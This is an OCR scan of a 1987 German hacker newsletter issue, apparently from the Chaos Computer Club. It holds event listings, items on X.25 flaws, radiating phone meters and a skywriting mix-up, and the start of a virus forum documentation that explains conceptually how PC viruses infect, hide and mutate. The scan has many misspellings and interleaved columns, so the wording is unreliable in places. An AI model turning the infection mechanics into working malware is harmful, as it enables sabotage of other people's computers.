28.12.-29.12. CHAOS COMMUNICATIONCONGRESS 1987 - Hamburg 

Die europäische Hackerparty im Eidelstcdter 
Bürgerhaus. 

Weitere Hinweise in den Btt-Programmen: 

CCC bundesweit *655321# 

CAC Regionalbereich 17*920163# 

BHP Regionalbereich 32 *92049204# 

LS23 • hacker.txt 

Zukunftswerkstatten 1987 

im Rahmen des Programms 'Mensch und Technik • 

sozialveträgliche Technikgestaliung’ des Landes Nordrhein-Westfalen. 

Anmeldung bei: Zukunftswerkstälten, Nesenhaus 17,4030 Raüngen 6 

20.- DM als Scheck oder bar beifügen. 


27.02.-01.03. 

DIE VERKABELTE FAMILIE - CHANCEN, PERSPEKTIVEN 

UND GEFAHREN 
in Kerken 

09.03. - 11.03. 

ZWISCHEN VIDEO UND COMPUTERNETZEN - 
POLITISCHES LERNEN MIT NEUER TECHNIK 
in Soest 

20.03 

FORUM ZU MENSCHENGEMÄßER INFORMATIONS- UND 
KOMMUNIKATIONSTECHNIK in Köln 

23.03. - 27.03. 

MEDIA-PARK KÖLN - STADTTEIL FÜR MODERNE TECHNOLOGIE, 
LEBENS-, LERN- UND ARBEITSQUALITÄT in Köln 

30.04. - 03.05. 

ZUKUNFT DES LEHRENS UND LERNENS IN EINER VON TECHNIK 
GEPRÄGTEN WELT in Leichlingen 

15.05. - 17.05. 

NEUE MEDIEN UND BORGERMITWIRKUNG M KOMMUNALEN BEREICH 
in Marl 

29.05.-31.05. 

WELCHE VORTEILE BRINGT DIE BILDSCHIRMARBEIT DEN FRAUEN? 
in Bielefeld 

(NUR für Frauen - für Kinderbetreuung ist gesorgt) 

19.06. - 21.06. 

DER HARTE UND DER SANFTE WEG? 


Wege zu einer sozial verträglichen Technik 
in Berg. Gladbach 



DS Saite Zwai 


0 afcndd)k«i>cr 


ISTHack 


Schon während der Aufbauphase des CCC‘86 glück¬ 
te der erste Hack: Bei Forschungsarbeiten in einem 
heimischen Großrechner Marke VAX wurde ein 
Kieinverzeichnis von Computerinstallationen in 
Moskau, zuzüglich Seriennummern, gefunden. Unter 
anderem steht dort "1 CBM 8032 und I CBM 8250” 
sowie ”1 Tüte mit Bauteilen”, 
wau 


Hacker - 
Erinnerung und 
Wainung 


(Gruppenleiter, 
CERN-DD/CS, 
Sektion EN) 


von Giorgio Heimann 


”Wir leiden noch immer täglich unter Attacken von 
Hackern. Zur Zeit können wir an einigen VAXen der 
CERN ungefähr 20 "Einbruchsversuche” täglich 
beobachten. 

Obwohl wir uns mit Hilfe der CERN-Rechtsabtei- 
lung darauf vorbereitet haben, die Schweizer PTT 
einzuschallen, um herauszufinden, welche Aktionen 
möglicherweise gegen diese Leute unternommen 
werden können, bestehen wir jedoch nach wie vor auf 
dem Prinzip, daß jedes System sich selberzu schützen 
hat. Dies ist die einzig sinnvolle Lösung, da es einen 
sehr viel differenzierteren .Schutz ergibt: außerdem 
verlagert diese Strategie die Verantwortung zum 
Schutz der Betriebsmittel dahin, wo sic hingehört, 
nämlich zum Eigentümer der Betriebsmittel. 

Neben "externem” Hacken haben wir vor einigen 
Wochen einen Fall einer internen Attacke gehabt. 
Der Ausgangspunkt des Vorfalls wurde zurückver- 
folgt und die verantwortliche Person konnte identifi¬ 
ziert werden. Wir beschlossen, diesen Vorfall zu ver¬ 
gessen, da in diesem speziellen Fall keinerlei böser 
Wille im Spiel gewesen war. Wir mußten aber eine 
Menge (rarer) Arbeitskraft für die Suche verplem¬ 
pern, so daß unsere Aufmerksamkeit von unseren ei¬ 
gentlichen Aktivitäten und der Überwachung von 
ernsteren und böswilligeren Attacken abgezogen 
wurde. 

Deshalb seien alle CERN-Benutzer gewarnt, daß wir 
in Zukunft möglicherweise mit ernsthafter Verfol¬ 
gung gegen Leute vergehen, die für "Hack-Attac- 
ken” verantwortlich sind.” 

Aus: '"Mini & Micro Computer Newsletter'', Dec. '85: Überset¬ 
zung: T. Twiddlebit 



Dalcx-P: Auslösung 

Entwicklungsfehler 



Wenige haben es noch nie erlebt: Auf einmal bricht die 
Verbindung zusammen, ja, cs scheint sogar so häufig 
vorzukommen, daß schon “Ansagetexte" wie 

PATEX-D: Auslösung - Veranlassung durch Durchfall 
PATEX-POO; Einlösung - Veranlassung durch Zufall 

im GeoNet zu finden sind. 

Warum das passiert, liegt häufig daran, daß durch Über- 
tragungsstömngen die zwei an einer Pakctübcnnitllung 
beteiligten Reclincr total aus der Synchronisation laufen, 
d.h. jede Seite "vermutet“ etwas falsches über den Zu¬ 
stand der anderen Seite. 

Unglücklicherweise ist nun das X.25 Protokoll, der in¬ 
ternationale Standard für viele Strecken im Pakclnetz, so 
konstmiert. daß es nicht selbstsynchronisiercnd ist. Eine 
Paketübermittlung mit X.25 ist in einem labilen Gleich¬ 
gewicht; zu Beginn der Übertragung werden spezielle 
Initialisierungspakete ausgetauscht, die nur einen ein¬ 
deutigen Zustand hersteUen, wenn die Sendc/Emp- 
fangspuffer auf beiden Seiten geleert sind. 

Resultat: Nach dem Herstellen einer virtuellen Verbin¬ 
dung "vergißt" das Netz manchmal, welche Pakete schon 
“abgeliefert“ sind. Resultat: 

DATEX-P: Auslösung - Ablauffehler 

Die Gründe dafür sind historischer Natur: 

X.25 wurde aus dem IBM SDLC (Synchronous Data 
Link Control) heraus cntwickelt/übemommen. Daboi 
haben sich in den X.25 Standard Stmkturen aus SDLC 
Tagen eingeschlichen, dieinzwischen vollkommen sinn¬ 
los sind; andere, für eine Resynchronisierbarkeit not¬ 
wendige Informationen, werden jedoch nicht übermit¬ 
telt. Dies ist bei der Weiterentwicklung und Benutzung 
von X.25 erkannt worden und führte zur Erfindung von 
immer neuen, speziellen “Steucrpakclcn“. Kurz; Ein 
typisches Beispiel für einen im GRUNDE vermurksten 
Kommittee-Entwurf, der auch durch Einziehen immer 
neuer Stützbalken nicht richtiger wird. 

Folge: Ein Alptraum an Komplexität und Sonderfall- 
bchandlung für jeden Systemprogrammicrer, der ein 
X.25 Protokoll implementieren muß. Zustzlich ist der 
Wortlaut in den CCITT Dokumenten so vieldeutig, daß 
Implementationen, die sich an den Text gehalten haben, 
inkompatibel sind. 

Für eine ins einzelne gehende Kritik und - vor aUem - 
einen konslraklivcn Vorschlag für ein sclbstsynchroni- 
sicrendes Protokoll (in Pscudo-Pascal), das sehr einfach 
zu implementieren ist: “Serial Link Proiocol Design; A 
Critique of ihc X.25 Standard, Level 2" by John G, 
FIcteher, Lawrence Livermore Lab. erschienen in einem 
Konfcrcnzbcricht der SIGCOMM (ACM) 1984 “Com¬ 
munications Architectures & Protocols“ 

KS 


SrtfcnSrfjlcubce 


DS Saite Drai 





Strtililongefilhr 

k ' aus dem Telefon 


Wir berichteten in der letzten Ausgabe (ds 17) über 
ein neues Leistungsmerkmal der Gebührenzähler in 
Posttelefonen. Inzwischen beschäftigt sich der Bun¬ 
desbeauftragte fUrden Datenschutz (BfD) mit diesem 
Phänomen. 

Festgestellt wurde, daß alle mechanischen GebUh- 
renzähler (herkömmlicher Bauart, ca. 1,3 Mio.) einen 
Fehler im "Begrenzverstärker” aufweisen und da¬ 
durch (in Toleranzgrenzen) im Langwellenbereich 
das Gespräch wie ein Sender ausstrahlen. Dieses Si¬ 
gnal wurde mit guten Empfängern beim FTZ noch in 
40 cm Entfernung gemessen. Inwieweit metallische 
Leitungsführungen (z. B. Heizungen) dieses Sendesi¬ 
gnal weiterleiten und dadurch die Reichweite ver¬ 
stärken, wurde noch nicht berücksichtigt. 

Eine Austauschaktion der betreffenden Gebühren¬ 
zähler erscheint dem BfD im Verhältnis zum Auf¬ 
wand nicht angemessen. Vielmehr sollten alle betref¬ 
fenden Fernsprechteilnehmer über diesen Umstand 
informiert werden. Desweiteren ist es zu überdenken, 
die Störstrahlenverordnungen für zukünftige Entwic¬ 
klungen anzupassen. Bisher entsprechen die "strah¬ 
lenden" Telefone diesen Vorschriften. 

Strahlende Fernsprechteilnehmer erhielten bisher 
kostenfrei Ersatzgeräte. Derzeit läuft gerade eine 
Bundestagsanfrage derGRÜNEN zu diesem Thema, 
über deren Ausgang wir berichten werden. 

LS23 

STRAHL18.DOC 19870131 2053 


DPA hackt 


förderte den Namen des himmelschreibenden Piloten 
zutage. Dieser, gerade wieder festen Boden unter den 
Füßen, zeigte sich eher belustigt über die Interpreta¬ 
tion des Hauses dpa. Er habe die Telefonnummer 
611061 an den Himmel geschrieben, und das wäre die 
Rufnummer einer Hamburger Taxizentrale. Da hätte 
dpa wohl einen etwas falschen Standpunkt gehabt 
und die Zahlen verdreht. 

Wer da nun was hinter die Rufnummer I90M9 ge¬ 
klemmt hat, ist bis zur Stunde unbekannt. Wie aus gut 
unterrichteten Krei.sen verlautet, wurden erste Re¬ 
cherchen angeleiert. Möglicherweise handelt es sich 
aber auch nur um ein einfaches Telefax-Gerät... 
jwi 

DPAHAK18.DOC 1987 0131 2000 


.Stcllcnan/cigc 


Wir stellen 1: 


- Buchhalterin) 

- Datatypist(in) 

- Programmierer(in) für C, Pascal, Ba¬ 
sic, 68000 Assembler 

- Chefsekretär(in) 

- Postbearbeiter(in) 

- Archivar(in) 

Aber nicht etwa sechs Einzelpersonen, sondern 
EINE fähige Kraft, die das alles zusammen kann, 
ohne nach 46.983 Sekunden (bisherige Bestleistung) 
einen Zusammenbruch zu erleiden. Wir sind ein auf¬ 
strebender Verein von Compuierchaoten auf der Su¬ 
che nach den Problemen, für die wir jetzt schon Lö¬ 
sungen haben. 

Wir bieten: 


Tief versunken in der Arbeit werkelte am Dienstag, 
den 9. Dezember 86 die G.ID.-Redaktion (Genethi¬ 
sche InformationsDienste; die biologische Daten¬ 
schleuder) an ihrer nächsten Ausgabe. Plötzlich 
schrillte das Telefon. Eine Mitarbeiterin der Deut¬ 
schen Presse- Agentur hatte am Himmel ein Flugzeug 
entdeckt, welches eine mysteriöse Zahlenkombina¬ 
tion in die Wolken über Hamburg schrieb. 

Durch kreatives Betrachten konjite die Zahlenreihe 
190 119 entziffert werden, wobei sich sofort der 
Schluß aufdrängte, es könne sich um eine Telefon¬ 
nummer handeln. Das Telefon wurde angeworfen - 
und tatsächlich. 

DOCH AUF DER ANDEREN SEITE WAR KEI¬ 
NE MENSCHLICHE STIMME • sondern ein 
merkwürdiger Piepston. Nun sind auch dpa-Journa- 
listen technisch versiert und schlußfolgerten, daß es 
sich um einen ”Computerton” handeln muß. Sofort 
wurde das hauscigcne Texi aktiviert und munter 
drauflos gehackt. Allerdings ohne Erfolg. Hilfe wur¬ 
de nun von der angeblich technisch versierten G.ID- 
Rcdaktlon erbeten. Doch auch diese scheiterte am 
beschränkten know how. 

Um das Gesicht zu wahren, beschlaß man, das Pro¬ 
blemfeld zu verlagern und ”nichttechnische Alterna¬ 
tiven” einzuieiten. Ein Anruf beim Flughafen-Tower 


- angenehme Arbeitsatmosphäre in einem typischen 
Feuchlbiotop 

- rasche Aufstiegsmöglichkeiten (ein Teil unseres 
Archivs lagert auf dem Dachboden) !L- abwechs¬ 
lungsreiche Tätigkeit (jeden Tag ein anderes Datum) 

- interessante Sozialleistungen (was wir uns leisten, ist 
wirklich sozial = gemein) 

- angemessene Bezahlung (unserem Konto angemes¬ 
sen) 

- eigenverantwortliche Tätigkeit (wir werden Sie 
schon zur Verantwortung ziehen) 

- gleitende Arbeitszeit (Sie haben da zu sein, wenn wir 
Sie brauchen) 

- klare Arbeitstrukturen (Sie erhalten maximal sieben 
widersprüchliche Auträge) 

Wirerwarten: 


- keine Widerrede 

Bewerbungen bitte bis gestern an die Re(d)akuon; 
Lichtbild unnötig, Lebenslauf und Referenzen un¬ 
wichtig. Wer sich bei uns bewirbt hat eh keine andere 
Wahl. Gewerkschaflier erwünscht (sofern Mitglied 
der Gewerkschaft der Sklaven des römischen Rei¬ 
ches), 
goblin 


DS Saite Via 




Das PG-Virenforum 


f Chaos 

Communication 

Congress 


Eine Dokumentation in fünf Teilen 

von Steffen Weraery 


Teil 1 - Virus Grundlagen, ein geschichtlicher Rückblick 
Teil 2 - PC-Virus Grundlagen (basierend auf MS-DOS) 
Teil 3 - Der Demovirus für MS-DOS 
Teil 4 - Juristische Hinweise 
Teil 5 - Thesen und Ansichten 


"Ein ’Virus’-Programm, ins Betriebssystem 
eingepflanzt, gehört zum Gefährlichsten, 
was ein DV-System bedroht.” Zu dieser 
Aussage kam die in Ingelheim erscheinende 
Zeitschrift für Kommunikations- und EDV- 
Sicherheit (KES) im,Juli 1985. Vorausge¬ 
gangen war die erste deutschsprachige Ver¬ 
öffentlichung über Computerviren in der 
Bayrischen Hackerpost (3/85). Seitdem gei¬ 
stert das Thema durch die Fachpresse und 
wird von Insidern hinter vorgehaltener 
Hand diskutiert. Alle bisherigen Veröffentli¬ 
chungen zu diesem Thema beruhen auf For¬ 
schungsergebnissen, die Fred Cohen 1984 an 
der University of Southern California erar¬ 
beitete. 

Neuere Erkenntnisse, gerade im Hinblick 
auf die zunehmende Verbreitung programm¬ 
kompatibler Personalcomputer (PC’s), sind 
bis heute nicht bekannt geworden. 

Mitte 1986 tauchten die ersten PC-Viren in 
Freeware (Programme zum Tauschen) aus 
den USA in der BRD auf. In den Folgemo¬ 
naten gingen in der Redaktion der DATEN¬ 
SCHLEUDER erstmals in Deutschland 
programmierte Viren für Heim- und Perso¬ 
nalcomputer (u.a. MS-DOS) ein. Die ersten 
Programmierer wandten sich an den Chaos 
Computer Club (CCC) - wohin sonst? 
Obwohl durch entsprechende Veröffentli¬ 
chungen in der Fachpresse eine Sensibilität 
für das Gefahrenpotential der Computervi¬ 
ren bei Herstellern von Betriebssystemen, 


den Systemhäusern und Softwareanbietern 
vermutet werden sollte, bewiesen unsere Re¬ 
cherchen das Gegenteil. Die Systemhäuser 
haben oder wollen die Problematik nicht er¬ 
kennen. Ein Bewußtsein, das zur Informa¬ 
tion über Risiken verpflichtet, ist dort bisher 
nicht vorhanden. Vielmehr ist zu erwarten, 
daß Industrie und Handel das Gefahrenpo¬ 
tential durch Unterlassung von Information 
fahrlässig fördern. 

Die meisten Anwender von Personal-Com¬ 
putern in Industrie, Handel und Handwerk 
sowie alle privaten Nutzer sind somit dieser 
Entwicklung schutzlos ausgeliefert. 

Der CCC sah sich deshalb veranlaßt, den 
Chaos Communication Congress ’86 
(CCC’86) unter den Schwerpunkt”Compu- 
ter-Viren” zu stellen. Nur eine Öffentliche 
Diskussion kann eine Sensibilität für diese 
Entwicklungen fördern und Erkenntnisse 
über Folgen, Auswirkungen und Schutzmö¬ 
glichkeiten sammeln und vermitteln. 

Ende Dezember wurde in Hamburg das 
weltweit erste Öffentliche Diskussionsforum 
über Computerviren für Home- und Perso¬ 
nalcomputer abgehalten. Rund 200 Hacker, 
Studenten und Computerfreaks, davon ca. 
20 Programmierer mit Viren-Erfahrungen 
nahmen an diesem Forum teil. 

Diese Dokumentation faßt erstmalig Er¬ 
kenntnisse und Diskussionen des VirenFo- 
rums zusammen. 


DS Saite Föml 






Teill 


Virus-Grundlagen 
Gesrhichflirher Riirkhlick 

Allgemeines 

Der Begriff "ComputerViren” wurde 1983 von Len 
Adleman an der Universityof Southern California im 
Zusammenhang mit Cohens Experimenten geprägt. 
Als Computer-Virus wird ein Programm bezeichnet, 
das die Eigenschaft hat, andere Programme zu infi¬ 
zieren. Jedesmal, wenn ein Virus aktiviert wird (z.B. 
durch Starten eines verseuchten Programms), kopiert 
es sich selbst in ein anderes, noch nicht infiziertes 
Programm. Jedes infizierte Programm ist ein Viren¬ 
träger und steckt bei Aktivierung wiederum weitere, 
unverseuchte Programme an. Die Infektion breitet 
sich, biologischen Viren ähnlich, lawinenartig in 
einem DV-System oder Netzwerk aus. Das Virus brei¬ 
tet sich auf den legalen Pfaden aus, es benutzt die Au- 
torisierung der infizierten Programme. Anwender mit 
hohen Zugriffsrechten auf Netzwerken verschleppen 
das Virus in alle Teile einer DV-Anlage. Dies sind die 
ersten entscheidenden Eigenschaften von Compu- 
terViren. 

Es ist sicher problematisch, für technische Abläufe 
biologische Begriffe zu verwenden. Die Bezeichnung 
”Virus” ist ein Sammelbegriff für eine besondere 
Form organischer Strukturen, die sich nur über eine 
spezifische Wirtszelle vermehren können. Hierin liegt 
eine gewisse Ähnlichkeit, denn "ComputerViren” 
benötigen ebenfalls ein "Wirtsprogramm”, das das 
Virus aufnehmen und verbreiten kann. Obwohl der 
Vergleich nicht stimmig ist, haben US-Wissenschaft- 
ler Begriffe wie ”Viren”, "Seuchen” und "Infektio¬ 
nen", wegen der Ähnlichkeiten mit biologischen 
Abläufen, schon vor Jahren geprägt. 

Computer-Seuchen 

Über sogenannte Seuchen, die mit Hilfe von Wirt- 
sProgrammen in DV- Systeme "verschleppt” werden, 
gibt es Untersuchungen, die zum Teil schon vor 10 
Jahren veröffentlicht wurden. Bereits in den 70er Jah¬ 
ren berichteten Anderson und Linde über "Trojani¬ 
sche Pferde", Programme, die gezielt fremde Pro¬ 
gramme angreifen und dort Funktionsabläufe verän¬ 
dern. Im Gegensatz zu CompuierViren verbreiten 
sich "Trojanische Pferde" nicht ungezielt, sondern 
greifen gezielt ein (REM: if you find Wordstar then 
ersetze funktion sichern gegen löschen). 

Hinterhältige Bedrohung 

Die eigentliche Gefahr der Virenprogramme ist, ne¬ 
ben der unkontrollierten Verbreitung, die Einschleu¬ 
sung von manipulierenden Programmabläufen. Das 
Virus kann als Programm jedwede vostellbare und 
programmierbare Manipulationsaufgabe mit sich 
führen und verbreiten. Dadurch wird die Gebrauchs¬ 
fähigkeit der Computer radikal in Frage gestellt. Das 
Virus kann ungehindert alle Abläufe verändern, ver¬ 
fälschen, ersetzen oder völlig andere Aufgaben aus¬ 
führen. Eine perfide Form von Compulersabotage, 
gegen die besonders gängige Personalcomputer un¬ 
geschütztsind. 


Spärliche Informationen 

Bisher lagen nur wenig differenzierte Informationen 
über erfolgreiche Experimente mit ComputerViren 
vor. Fred Cohens Versuche auf mittleren und grossen 
Rechnern wurden wegen deren Gefährlichkeit von 
den Systemverantwortlichen abgebrochen. Versiche¬ 
rungen und Banken, sowie das Militär halten sich mit 
ihren Erkenntnissen bedeckt. Aus Industriekreisen 
war nur gerüchteweise von erkannten Viren die Rede 
(wer hätte auch den Mut zu sagen: Wir sind ver¬ 
seucht). Professor Dr. Brunnstein (UNI HH) berich¬ 
tete auf der Pressekonferenz des CCC’86 von einem 
Virus auf dem Universitätsrechner, der von einem 
kommerziell genutzten System aus eingegeben wur¬ 
de. Auch die Technische Universiät Berlin vermutete 
einen Virenbefall und mußte Anfang *86 einen 14tä- 
gigen Ausfall ihrer IBM/4381 (Großrechner mit 
komfortablem Betriebssystem) hinnehmen, bis der 
Betrieb mit einer "sauberen" Systemversion wieder 
aufgenommen werden konnte. 

Kein Gefahrenbewußtsein 

Rüdiger Dierslein (DFVLR) beschrieb bereits auTder 
neunten Datenschutzfachtagung am 14. II. 85 in 
Köln wesentliche Aspekte des Virus-Phänomens. "Es 
ist längst bekannt, daß man Programme schreiben 
kann, die sich selbst in einem Computersystem re¬ 
produzieren. Solche Programme können mit bösarti¬ 
gen Eigenschaften versehen sein. Die Reproduktion 
der Programme samt ihrer unerwünschten Neben¬ 
wirkungen kann auf eine Art gestaltet werden, daß 
andere, beliebige Programme zum Träger werden. Es 
sind "unauffindbare” Viren möglich, Unterpro¬ 
gramme also, die sich einer systematischen Suche 
durch Eigenmodifikation (sich selbst verändernder 
Viruscode) entziehen". 

Dierstein mußte sich in der folgenden Diskussion mit 
"Abwehrreaktionen" auseinandersetzen. Besonders 
markant fiel die Stellungnahme des IBM-Daten- 
schutzbeauftragten G. Müller aus, der das Virusphä¬ 
nomen als ein theoretisches, in den Softwarelabors 
längst gelöstes Problem bezeichnete. 

So wundert es nicht, daß trotz ausführlicher Informa¬ 
tionen ein Gefahrenbewußtsein gegenüber den Com¬ 
puterViren nicht ausgebildet ist. Gegenmaßnahmen 
werden vom DATENSCHUTZBERATER(5/86) als 
"eher dürftig und konventionell" bezeichnet. Refe¬ 
renten von Sicherheitsseminaren meldeten "eine un¬ 
glaubliche Ignoranz" verantwortlicher Systcmbeirei- 
ber gegenüber der Bedrohung durch ComputerViren. 
Für den Bereich der Personalcomputer bleibt fcstzu- 
stellen, daß bisher nur der DATENSCHUTZBERA¬ 
TER (10/86) sich dieses Themas angenommen hat. 
Neue Erkenntnisse waren dort aber ebensowenig zu 
finden wie in der jüngsten Veröffentlichung der 
Computerpersönlich (24/86). 



iSinIcnSdjIcnbcT 


Fahrlässige Informationspolitik 

Es bleibt festzustellen, daß ein Bewußtsein über die 
Bedrohung durch ComputerViren bisher nicht aus¬ 
gebildet ist. Hinzu kommt, daß die Bereiche Heim- 
und Personalcomputer unbeleuchtet blieben. Die In¬ 
dustrie hat bis dato jegliche öffentliche Auseinander¬ 
setzung mit diesem Thema vermieden. Programmie¬ 
rer von PC-Viren, die sich zwecks Infomationsau¬ 
stausch mit verschiedenen Firmen in Verbindung 
setzten, ernteten eher Unverständnis, ("Für welchen 
Preis wollen Sie Ihr Virus auf den Markt bringen?") 
aber keine Basis für qualifizierte Gespräche. Es 
drängt sich der Verdacht auf, daß bisher keine Ab¬ 
wehrstrategien entwickelt wurden und deshalb dieses 
Thema absichtlich totgeschwiegen wird. Totschwei¬ 
gen ist bekanntlich kein Abwehrrnimel, eher wird der 
unkontrollierten Verbreitung dadurch Vorschub ge¬ 
leistet. 

Soweit der geschichtliche Rückblick. 


Teil 2 


Das PC-Virus 


Grundlagen, basierend auf Erfahrungen 
mit dem Betriebssystem MS-DOS 


Im folgenden sollen, zur Vermittlung der Grundla¬ 
gen, einige VirusFormen erläutert und auf deren Ver¬ 
breitungsverhalten eingegangen werden. Darüber hi¬ 
naus werden Hinweise über mögliche Manipulation¬ 
saufgaben und den Schutz gegen ComputerViren ge¬ 
geben. Die Informationen beziehen sich auf Erfah¬ 
rungen mit dem Betriebssystem MS-DOS, die auch 
für ähnliche Betriebssysteme gelten. 

Funktionsweise einiger ComputerVi¬ 
ren 

ComputerViren können sich auf unlerschiedliche 
Arten in Programmbeständen verbreiten. Dabei kön¬ 
nen die betroffenen Programme In ihrer ursprüngli¬ 
chen Funktion gestört werden. Zur Differenzierung 
erläutern wir, auf der Basis der Erkenntnisse, die Ralf 
Burger Mitte 1986 dokumentierte, die wesentlichen 
Unterschiede zwischen 

— überschreibenden 

— nichtübcrschreibcnden und 

— speicheresidenten 
Viren. 

Ein ComputerVirus besteht aus mehreren Programm¬ 
teilen. Um bereits infizierte Programme zu erkennen, 
versieht das Virus diese Programme mit einem Er- 
kennungsMerkma! (M). Der Programmieil mit der 
Verbreitungsaufgabe wird als Viruskern (VIR) be¬ 
zeichnet. Zusätzlich kann über das Virus eine Mani¬ 
pulationsaufgabe (MAN) verbreitet werden. Vor der 
Ausführung der ursprünglichen Programmaufgabe 
muss das betroffene Programm eventuell durch eine 
Verschieberoutine (VER) wiederhergestelU werden. 

Sntcnädjlciibcr 


M = ErkennungsMerkmal 

VIR = Verbreitungsaufgabe (Virulenz) 

MAN = Manipulationsaufgabe 
VER = Verschieberoutine 

Funktionsweise überschreibender Vi¬ 
ren 

Überschreibende Viren beeinträchtigen oft die Funk¬ 
tionsabläufe der infizierten Programme. Das Virus 
überschreibt einen Teil des vom betroffenen Pro¬ 
gramm belegtem Speicherplatzes. Dabei wird das 
Programm zer- oder gestört, wobei das Virus nicht 
durch Erhöhung des Speicherplatzes auffällt. 

Um ein ComputerVirus einzuschleusen, wird ein so¬ 
genanntes Trägerprogramm mit dem Virus infiziert. 
Das Trägerprogramm weist bei der Ausführung kei¬ 
nen Fehler auf, da das Virus entsprechend sorgfältig 
eingepaßt wurde. Wird das Trägerprogramm als nütz¬ 
liches Hilfsprogramm getarnt, kann die Verbreitung 
z.B. durch die Neugier des unbedarften Anwenders 
gestartet werden. 


! M ! VIR ! MAN ! 1. Programm ! 


Wird das 1. Programm aktiviert, findet das Virus beim 
Suchen im Inhaltsverzeichnis des Datenspeichers 
(vorzugsweise Festplatten) ein 2. Programm. Wenn 
dieses bereits das ErkennungsMerkmal aufweist, 
wird weitergesucht. 


! 2. Programm 

Der Viruskern kopiert das vollständige Virus in das 2. 
Programm hinein und überschreibt dabei den für das 
Virus benötigten Speicherplatz am Programmanfang. 
Das geänderte Programm wird abgespeichert und die 
MANipulationsaufgabe des Virus wird ausgeführt. 
Erst danach wird das I. Programmausgeführt. 


! M ! VIR ! MAN ! , . . Rest des 2 . Programms ! 

Beim Starten des 2. Programmes findet zuerst die 
Übertragung in das 3. Anwenderprogramm statt. Das 
2. Anwenderprogramm arbeitet eventuell fehlerhaft, 
da Programmteile durch das Virus überschrieben 
wurden. 

! M ! VIR ! MAN ! . . . Rest des 3. Programms ! 

Dieser Verbreitungsvorgang wiederh olt sich bis zur 
totalen Durchseuchung des Systems. Bei diesem Vi¬ 
rus-Typ kann das Virus als das letzte funktionsfähige 
Programm übrigbleiben. 

Bei geschickter Programmierung des Virus bleiben 
auch bei überschreibenden Viren einige Programme 
funktionsfähig. In einem relativ großem Buffer (von 
Programmen reservierter Speicherplatz) lassen sich 
Viren gut verstecken. SideKick läuft in wesentlichen 
Funktionen auch mit einem Virus dieser Form. Es 
stellt dadurch ein Risiko beim Programmtausch dar, 
denn Viren dieser Form können darin unbemerkt 
verbreitet werden. 


DS Saite Sächs 


DS Saite Siim 



I 


m' 


Funktionsweise nicht überschreiben¬ 
der Viren 

Nicht übcrschreibcndc Viren vergrößern den Spei¬ 
cherplatz des infizierten Programmes. Die betroffe¬ 
nen Programme bleiben funktionsfähig. 

Zum Zweck der Einschleu.sung ist ein Programm be¬ 
wußt mit einem Virus infiziert worden. Es tritt bei der 
Ausführung kein Fehler auf. 

\ M ! VIR ! MAN ! VER ! 1. Programm ! 

Der Viruskern findet beim Suchen ein 1. Programm. 
Wenn dieses Programm das ErkennungsMerkmal 
aufweisi, wird weitergesucht. 

! 2. Programm (Teil 1 und 2) ! 

Um den Speicherplatz am Programmanfang neu zu 
belegen, kopiert das Virus einen Teil des 2. Program¬ 
mes. welcher der Länge des Virus entspricht, an das 
Ende des Programmes. 


! 1, Teil ! 2. Prgrm T. 2 ! 

! 1. Teil ! 2. Prgrm T. 2 ! 1, Teil 


Der Anfang des 2. Programmes ist nun zweimal vor¬ 
handen. Jetzt legt das Virus hinter dem ans Ende ko¬ 
pierten Programmanfang die Verschieberoutine 
(VER) ab. 

! 1, Teil ! 2. Prgrm T. 2 ! 1, Teil ! VER ! 

Das Virus kopiert sich nun selbst an den Beginn der 
Datei und überschreibt dabei den l. Teil des Pro- 
grarnmes. Es speichert die geänderte Version ab. An¬ 
schließend wird die MANipulationsaufgabe, und da- * 
nach das 1. Programm ausgeführt. 

!M ! VIR ! MAN ! 2, Prgrm T. 2 ! l. Teil ! VER ! 

Beim Starten des 2. Anwenderprogrammes findet zu¬ 
nächst die Übertragung des Virus in das 3. Anwen¬ 
derprogramm statt. Danach wird die MANipulalion- 
saufgabe ausgeführt. Nun folgt ein Sprung zur Ver- 
schieberouiine. Diese Routine kopiert im Arbeits¬ 
speicher den 1. Teil des Programmes wieder an den 
Dateianfang. Dadurch wird das Virus im Arbeitsspei¬ 
cher Überschrieben. 


! I.Teil ! 2. Prgrm T. 2 ! I.Teil i VER ! 

Im Arbeitsspeicher steht jetzt wieder die Orginalver- 
sion des 2. Programmes. Die Verschieberoutine 
beendet ihre Aufgabe mit einem Sprung zur Starta¬ 
dresse am Dateianfang. Das 2. Programm wird nun 
fehlerfrei abgearbeitet; das 3. Programm ist infiziert 
worden. 

Vor dem Starten des 2. Programmes: 


l 3. Programm 


Nach dem Starten des 2. Programmes: 


! M ! VIR ' MAN ! 3. Prgrm T, 2 ! 1. Teil ! VER ! 

Besondere Formen von ComputerVi- 
ren 

Funktionsweise speicherresidenter Viren. 
Speicheresidente Viren sind eine Sonderform von 
ComputerViren. Der Unterschied liegt in der Form, 
in der sie tätig werden. In der Verbreitung gilt Für sie 
praktisch das gleiche wie für alle anderen Virentypen. 
Beim Starten eines infizierten Programmes werden 
vor Programmausführung die Verbreiiungsaufgaben, 
die Manipulationsaufgabe und die Verschieberouline 
des Virus in ungenutzte Bereiche des Arbeitsspei¬ 
chers kopiert. Dort hinterlegt, wird das Viru.s seine 
Aufgaben wesentlich flexibler erfüllen. 

Irn Arbeitsspeicher hinterlegte Programme (also auch 
Viren) können durch einen Interrupt (Meldung des 
Betriebssystems) aktiviert werden. Dadurch kommen 
diese Viren wesentlich häufiger zur Ausführung als 
solche, die nur beim Starten infizierter Programme 
ausgeführt werden. So genügt cs schon eine Diskette 
in ein derart verseuchtes System einzuiegen. Wird 
diese Diskette vom Betriebssystem erkannt, startet 
das Virus gleich einen Angriff und kopiert sich in ein 
Programm auf dem Datenträger. Der Ausbreitungs¬ 
drang speicheresidenter Vtren gilt als äußerst aggres¬ 
siv. Alle auf dem betroffenem DV-System benutzten 
Disketten können die "Seuche” verschleppen. 

Mutierende Viren 

Mutierende Viren ändern bei jedem Verbreiiungsvor- 
gang ihre Form. Dieses kann eine Veränderung der 
Manipulationsaufgabe sein (jedes Anwenderpro¬ 
gramm macht andere Fehler) oder auch nur ein Ver¬ 
tauschen der Programmteile eine.s Virus innerhalb 
des Speicherplatzes. Mutierende Viren könnten sich 
z.B. selbst in Baukastentechnik bei jeder Infektion 
neu zusammensetzen. Dadurch wird die Suche nach 
einem erkannten Virus erheblich erschwert. 

Ängstliche Viren 

Eine besondere Abart sind Viren, die bei einer Akti¬ 
vierung zwei (oder mehrere) Infiktionen in unver- 
seuchten Programmen durchführen und sich an¬ 
schließend selbst aus dem gestarteten Programm ent¬ 
fernen. Wird dem Anwender bewußt, daß das eben 
gestartete Programm befallen ist, ist die Seuche schon 
weitergezogen. 

Die MANipulationsaufgabe 

